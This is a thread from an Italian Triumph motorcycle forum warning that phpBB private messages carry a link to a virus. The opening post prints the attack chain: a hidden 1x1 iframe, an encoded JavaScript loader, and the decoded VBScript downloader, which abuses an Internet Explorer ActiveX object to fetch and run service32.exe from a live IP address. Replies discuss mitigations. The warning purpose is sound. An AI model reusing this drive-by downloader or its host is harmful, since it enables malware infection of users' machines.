Link utili:  TCP: il sito Italiano più importante dedicato alle motociclette Triumph

Segui TCP su: 

Benvenuto su Triumphchepassione, il Forum Triumph più attivo d' Italia!

Sei nuovo del Forum? LEGGI IL REGOLAMENTO e PRESENTATI in questa sezione. Non sai usare il Forum? Ecco una semplice GUIDA.

 


Pagina 1 di 2 12 UltimaUltima
Risultati da 1 a 10 di 14

Discussione: virus nei pm (nei Forum phpBB, non nel nostro!)

  1. #1
    TCP Rider L'avatar di Rough
    Data Registrazione
    19/07/06
    Località
    bologna
    Moto
    aprilia gulliver 50cc
    Messaggi
    619

    virus nei pm (nei Forum phpBB, non nel nostro!)

    SE RICEVETE UN MP CON OGGETTO "ALCUNI PENSANO VOI", "CIAO" O DA UTENTI CON UN NICK STRANO,

    NON APRITE IL LINK ALL'INTERNO DEL MESSAGGIO PRIVATO IN QUANTO SI TRATTA DI VIRUS.

    il fatidico pm con un link include un iframe che linka a un JavaScript document.write che costruisce un script:

    Codice:
    <html>
      <title>under construction</title>
      <body>
        <iframe src="http://195.225.176.34/user2/bond0167/index.php" width=1 height=1></iframe>
        <center><font size=12><b>under construction </b></font></center>
        <table height=100%>
          <tr height=100% valign=bottom>
           <td>
              <!--LiveInternet counter-->
             <script type="text/javascript">
               <!--
                document.write('<a href="http://www.liveinternet.ru/click" ' +
                'target=_blank><img src="http://counter.yadro.ru/hit?t44.6;r'+
                escape(document.referrer)+((typeof(screen)=='undefined')?'':
                ';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
                screen.colorDepth:screen.pixelDepth))+';u'+escape(document.URL)+
                ';'+Math.random()+
                '" alt="" title="LiveInternet" '+
                'border=0 width=31 height=31><\/a>')
             //-->
            </script><!--/LiveInternet-->
            </td>
         </tr>
        </table>
      </body>
    </html>
    il file php nell'iframe è:

    Codice:
    <script type="text/javascript">
    <!-- var var33122251183=(
    '%3C%53%43%52%49%50%54%20%6C%61%6E%67%75%61%67%65%3D%22%56%42%53%63'+
    '%72%69%70%74%22%3E%0D%0A%20%20%20%20%49%66%20%6E%61%76%69%67%61%74'+
    '%6F%72%2E%61%70%70%4E%61%6D%65%3D%22%4D%69%63%72%6F%73%6F%66%74%20'+
    
    ... altre 100 righe
    
    '%20%45%6E%64%20%49%66%0D%0A%20%20%20%0D%0A%20%20%20%20%45%6E%64%20'+
    '%49%66%0D%0A%20%20%20%20%45%6E%64%20%49%66%0D%0A%20%20%20%0D%0A%3C'+
    '%2F%53%43%52%49%50%54%3E%0D%0A%0D%0A');
    document.write(var33122251183);
    </Script>
    il risultato è:

    Codice:
    <script language="VBScript">
        If navigator.appName="Microsoft Internet Explorer" Then
        If InStr(navigator.platform,"Win32") <> 0  Then
    
        Dim Obj_Name
        Dim Obj_Prog
       
        set obj_RDS = document.createElement("object")
        obj_RDS.setAttribute "id", "obj_RDS"
        obj_RDS.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
       
        fn = "226184122185.exe"
        Obj_Name = "Shell"   
        Obj_Prog = "Application"   
        set obj_ShellApp = obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
        Set oFolder = obj_ShellApp.NameSpace(20)
        Set oFolderItem=oFolder.ParseName("Symbol.ttf")
        Font_Path_Components=Split(oFolderItem.Path,"\",-1,1)
        WinDir= Font_Path_Components(0) & "\" &  Font_Path_Components(1) & "\"
        fn=WinDir & fn
         
        Obj_Name = "Microsoft"   
        Obj_Prog = "XMLHTTP"   
        set obj_msxml2 = CreateObject(Obj_Name & "." & Obj_Prog)
        obj_msxml2.open "GET","http://195.225.176.34/user2/bond0167/service32.exe",False
        obj_msxml2.send
        On Error Resume Next
       
        Obj_Name = "ADODB"   
        Obj_Prog = "Stream"   
        set obj_adodb = obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
        If Err.Number Then
       
        Obj_Name = "Scripting"   
        Obj_Prog = "FileSystemObject"   
        Set obj_FileSys=obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
        Set download_file=obj_FileSys.CreateTextFile(fn, TRUE)
        download_file_size=LenB(XMLBody)
        For i=1 To download_file_size
        cByte=MidB(XMLBody,i,1)
        ByteCode=AscB(cByte)
        download_file.Write(Chr(ByteCode))
        Next
        download_file.Close
       
        Obj_Name = "WScript"   
        Obj_Prog = "Shell"   
        Set  obj_WShell=obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
        On Error Resume Next
        obj_WShell.Run fn,1,FALSE
        Else
        obj_adodb.Type=1
        obj_adodb.Open
        obj_adodb.Write(obj_msxml2.responseBody)
        obj_adodb.SaveToFile fn,2
        obj_ShellApp.ShellExecute fn
        End If
       
        End If
        End If
       
    </SCRIPT>
    tutte le board programmate in phpBB possono presentare il problema quindi occhio; per chi comunque fosse caduto nella trappola: viene scaricato il file service32.exe che genera a sua volta i files it_0167.exe e winsyst32.exe contenuti in c:\temp ed inizia a modificare i BHO di explorer... consiglio a chi è caduto in questo tranello di scaricarsi ed installare Spyware Terminator (che è freeware) o, meglio ancora, StopDialers.

  2. # ADS
    Circuit advertisement
    Data Registrazione
    Always
    Località
    Advertising world
    Messaggi
    Many
     

  3. #2
    TCP Rider Senior L'avatar di AVP191
    Data Registrazione
    13/03/06
    Moto
    ex speed 1050 nera - R 1200 GS 2010 nera
    Messaggi
    23,701
    grazie
    C'E' SEMPRE UN PURO PIU' PURO, CHE TI EPURA

  4. #3
    Bannato L'avatar di Saraceno
    Data Registrazione
    15/03/06
    Moto
    Speedona Sexy
    Messaggi
    11,183
    Grazie!!!

  5. #4
    TCP Rider L'avatar di gp.triple
    Data Registrazione
    19/05/06
    Località
    terra di merdor
    Moto
    speed triple 2004
    Messaggi
    3,117
    lavora solo sugli exe??da buon utente linux ne dovrei essere immune...
    grazie dell'info comunque

  6. #5
    TCP Rider L'avatar di Rough
    Data Registrazione
    19/07/06
    Località
    bologna
    Moto
    aprilia gulliver 50cc
    Messaggi
    619
    si gp...è un maledetto dialer, la provenienza è h**p://195.225.176.34/user2/bond0167...mi raccomando NON LO VISITATE

  7. #6
    TCP Rider L'avatar di gp.triple
    Data Registrazione
    19/05/06
    Località
    terra di merdor
    Moto
    speed triple 2004
    Messaggi
    3,117
    Citazione Originariamente Scritto da Rough Visualizza Messaggio
    si gp...è un maledetto dialer, la provenienza è h**p://195.225.176.34/user2/bond0167...mi raccomando NON LO VISITATE
    ok grazie mille rough!

  8. #7
    Amministratore L'avatar di Marco Manila
    Data Registrazione
    01/03/06
    Località
    Rimini
    Moto
    Tiger 800 XCx
    Messaggi
    34,246
    Rough, detto così sembra che ci sia un virus nei pm del nostro Forum, mentre alla fine ti riferisci a quelli programmati in phpBB, mentre in nostro è un Vbulletin.

    Mi confermi che non ne hai ricevuti di pm simili da noi?

  9. #8
    Ambasciatore del Forum TCP L'avatar di fabiomugello
    Data Registrazione
    07/03/06
    Località
    Mugello
    Moto
    Speed 1050-Px125-Ape105cc-R1200R motozappa Honda 160cc
    Messaggi
    12,007
    vabbè comunque grazie!
    vendo-motore-completo-smontato-triumph-speed-triple-2-parti-non-funzionanti>
    non scrivete mai su il mio vecchio nickname, quello con la x! grazie

  10. #9
    TCP Rider L'avatar di Rough
    Data Registrazione
    19/07/06
    Località
    bologna
    Moto
    aprilia gulliver 50cc
    Messaggi
    619
    certo boss...nessun pm da qui...
    ma leggevo in rete (sempre per lavoro) e sembra che sia più bastardo dei soliti sto' qua...qualcuno paventava l'attaccabilità anche di vb ma per ora nessun caso noto... ma la prudenza non è mai troppa

  11. #10
    TCP Rider L'avatar di D@lyn
    Data Registrazione
    30/03/06
    Località
    Rimini
    Moto
    speed triple 955i
    Messaggi
    3,218
    è un buco di phpBB non su Vbulletin come detto da Marco adesso non ho fatto caso a che impostazioni ci sono nei msg privati ma per tagliar la testa al toro basta disabilitare i tag html nei pm

Pagina 1 di 2 12 UltimaUltima

Discussioni Simili

  1. TCP come un virus...
    Di Acme nel forum Il Bar di Triumphchepassione
    Risposte: 18
    Ultimo Messaggio: 31/01/2011, 19:50
  2. virus
    Di maxsamurai nel forum Problemi tecnici del Forum e richieste di aiuto
    Risposte: 32
    Ultimo Messaggio: 28/02/2010, 18:33
  3. Ma il NOSTRO FORUM..... ???
    Di japkiller nel forum Il Bar di Triumphchepassione
    Risposte: 44
    Ultimo Messaggio: 31/05/2007, 17:57
  4. Il numero perfetto di iscritti per il nostro Forum!
    Di Marco Manila nel forum Il Bar di Triumphchepassione
    Risposte: 31
    Ultimo Messaggio: 19/03/2007, 17:25
  5. COSA MANCA AL NOSTRO FORUM......
    Di giorgio bona nel forum Suggerimenti per migliorare il Forum e il Sito
    Risposte: 7
    Ultimo Messaggio: 13/03/2007, 06:58

Permessi di Scrittura

  • Tu non puoi inviare nuove discussioni
  • Tu non puoi inviare risposte
  • Tu non puoi inviare allegati
  • Tu non puoi modificare i tuoi messaggi
  •